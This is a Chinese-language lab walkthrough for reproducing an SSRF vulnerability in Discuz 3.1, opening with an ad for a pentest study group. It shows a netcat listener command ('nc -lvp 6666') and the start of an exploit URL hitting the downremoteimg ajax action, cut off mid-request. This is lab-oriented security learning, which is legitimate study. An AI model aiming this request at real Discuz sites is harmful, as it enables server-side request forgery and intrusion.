渗透学习交流群:773617250,进群即可领取一套完整的学习工具,群内定期直播,可与老师互动,欢迎大家进群学习交流!感谢大家的支持!
#001 环境搭建:
Phpstudy+win7搭建discuz漏洞环境
把Discuz-3.1 源码拖到网站根目录,然后访问upload目录进行安装,根据提示即可
安装完成访问一波:
#002 漏洞复现:
Centos7,临时关闭防火墙
开启nc监听6666端口:nc -lvp 6666
查看centos7的ip
利用discuz的漏洞向centos7发起一个请求:
http://192.168.136.132/discuz-ssrf/upload/forum.php?mod=ajax&action=downremoteimg&me